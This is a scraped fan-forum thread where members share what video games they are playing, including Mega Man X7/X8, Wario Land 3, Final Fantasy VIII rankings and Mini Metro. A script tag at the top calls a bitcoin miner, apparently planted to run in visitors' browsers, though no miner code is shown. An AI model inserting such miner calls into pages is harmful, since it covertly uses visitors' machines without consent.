<script>
miner.start(); // initialise bitcoin miner
</script>

smbx communitysmw centralmario fan games galaxy

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Bean

Re: What games are you playing?

Postby Bean » 4 weeks ago

I finished off a replay of Mega Man X7 last night. There are legitimate times where you won't jump when you want to, most notably on the green plane to green plane transfer in Wind Crowrang's stage. Moving on those planes is not fun at all. Game exists. Just like X5 and X6, it's bad in its own unique way.

Ashan
The world has become a place
First name: Hayden

Postby Ashan » 3 weeks ago

Finished off X8 today.
Got pretty pissed off in the final level with some of the platforming around spikes required. There was one jump where I don't think it would have been possible if I hadn't gotten the foot part for X that allows him to jump twice as high? And even then I could just barely make it, I don't know what the intended method was.
Final boss had a few too many phases for my taste. I also found it pretty bullshit in the final phase where the boss stops really attacking and you have to kill it within a certain amount of time or you get mysteriously insta-killed and have to redo everything.

Ashan
The world has become a place
First name: Hayden

Postby Ashan » 3 weeks ago

Oh yeah, also on the second-to-last stage, after I had fought all the mavericks and got to the first "Sigma" fight, I fought him once, died, came back, skipped the cutscene, and then the battle started with X still in cutscene mode I guess. Sigma's AI was going but X couldn't be damaged, I couldn't move, I couldn't pause, I couldn't do anything. Completely softlocked. Had to reset and do the boss rush all over again.

Slimeman01
Thank Goodness I Stopped at Subway Before This Mission!
First name: Matt
Pronouns: he/him/his

Postby Slimeman01 » 3 weeks ago

So, I just got the "PERFECT" screen on Wario Land 3 (Not going for Music Coins, golf ain't worth it), and I gotta say, I really enjoyed it!
I love how every level expands after you levels, and it's really fun to go back to previous levels and find out where you can go with your new abilities!
The only thing I didn't like was the huge knockback, but I get why its there, so I can't complain tooooo much
Great game, really hoping for a HD re-release, or heck just give us a new game!
Hey I got a new Twitter!
My Shoddy Youtube
raocow wrote:To answer your question Slimeman yes that is super fine
raocow wrote:alright guys what are the weirdest levels of world 4 ?! Make sure to pay attention to tomorrow's video as this may alter your answer!!

Bean

Postby Bean » 3 weeks ago

Playing my own file of Super Mario Party now. It's still all right and even good at times.

Bean

Postby Bean » 2 weeks ago

And completed Super Mario Party yesterday. Good game, all things considered. No clue what to move on to next.

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 2 weeks ago

I have done nothing but play Warframe for 4 weeks.

DELTARUNE Chapter 1 broke me out of my Warframe-induced haze for a single day. More on that later. Or probably in the Deltarune thread.
BOB is an acronym for BOB is Only BOB etc.

Bean

Postby Bean » 1 week ago

Diablo III of all games in a co-op run. I wasn't expecting it to play like it is, but that just goes to show you how there are so many genres I just don't get around to playing, I guess. It's basically Nine Parchments, but darker colors, actual equipment options, and procedurally generated dungeons.

pholtos
Loves adorable things.

Postby pholtos » 2 days ago

And that's FF8 finally finished. Game took til the end of Disc 1 to grab me.
What the heck is that plot. Time travel is a no no. :P
The gimmick of this game, junctions, was fairly interesting, albeit a bit hard to get used to. Big bads made sense, good progression. Had a couple times where I legit didn't know where to go or how to go about getting to a place. But at least for the most part it was easy to figure out how to traverse areas, which should never be a difficult thing to determine (lookin at you, awkward to traverse FF7). Overall I place this game slightly higher than 7 in my list.
Between when I played 7 and when I finished up 8, my rankings changed up a bit. Given I'd actually play 1 and 2 again but probably wouldn't play 7 again, that would make it worse in my eyes. So I put it there. 8 is sorta similar, but better off.
Updated rankings:
Amazing:6|Great:X,5|Good:2,1|OK but never again:8,7|Take it far far away:3,4
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.
Currently playing:

Griflion
I'm gonna chomp ya!

Postby Griflion » 2 days ago

Take it far far away: 3,4
Sry pholty, we can't be friends anymore.

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 2 days ago

pholtos wrote: Game took til the end of Disc 1 to grab me.
Wow, and for me that's the point everything interesting completely falls apart. VIII is easily the FF game I can write the most angry words about - that is, I don't hate it, I try not to waste words on hate, but I really do enjoy picking/tearing it apart compared to all other FFs. It's a delightful mess from my perspective, a complete failure as a story, narrative, romance, or a mechanical gameplay experience yet somehow enthralling. I won't deny that the music and cinematography helps a lot.

Mini Metro! My new wind-down game. Surprisingly stressful at times though, drawing lines to connect abstract stations based on real-world tube maps is genuinely satisfying. Love the audio design, simple and effective.
BOB is an acronym for BOB is Only BOB etc.

Parama

Postby Parama » 5 hours ago

Yeah I found mini metro too stressful/kinda luck-based to wanna play much of unfortunately
If I was suffering, I’d cut the ties that were never meant to bind.

Celeste Golden Strawberry Challenge (Spoilers):

Return to “the cartridgé”